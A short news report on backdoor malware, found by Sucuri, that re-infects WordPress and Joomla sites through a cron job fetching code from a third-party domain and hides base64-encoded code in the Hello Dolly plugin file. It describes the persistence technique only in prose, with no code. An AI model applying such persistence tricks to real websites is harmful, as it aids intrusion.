WordPress and Joomla websites infected by new backdoor malware

A new backdoor malware has been found re-infecting the files even after the website owners have cleaned their websites. It primarily targets to WordPress-based and Joomla-based websites to initiate its infection process.

The Wordpress and Joomla based websites are under attack as a new backdoor malware has been found re-infecting the files even after the website owners have cleaned their websites.

The malware attack came into the light thanks to a report from Sucuri who stated that the malware’s persistence on a website was “being created by a cron that was scheduled to download malware from a third party domain.”

Since the malware's source code has been configured only to detect WordPress and Joomla based websites, these are the primary targets. The malware is also notoriously known for determining the method it will use to further infect the website files, based on the type of platform.

According to Scruni researchers, the malware infected its client’s website which was using WordPress. It abused the default ‘Hello Dolly’ WordPress plugin to further its infection process.

“The malware proceeded to preserve the existing timestamps of the default WordPress plugin “Hello, Dolly”, then attempts to hide base64 encoded malware to the plugin file ./wp-content/plugins/hello.php,” said the Sucuri researchers in a blog post.

The backdoor malware maintained its foothold despite the sanitation process on the website.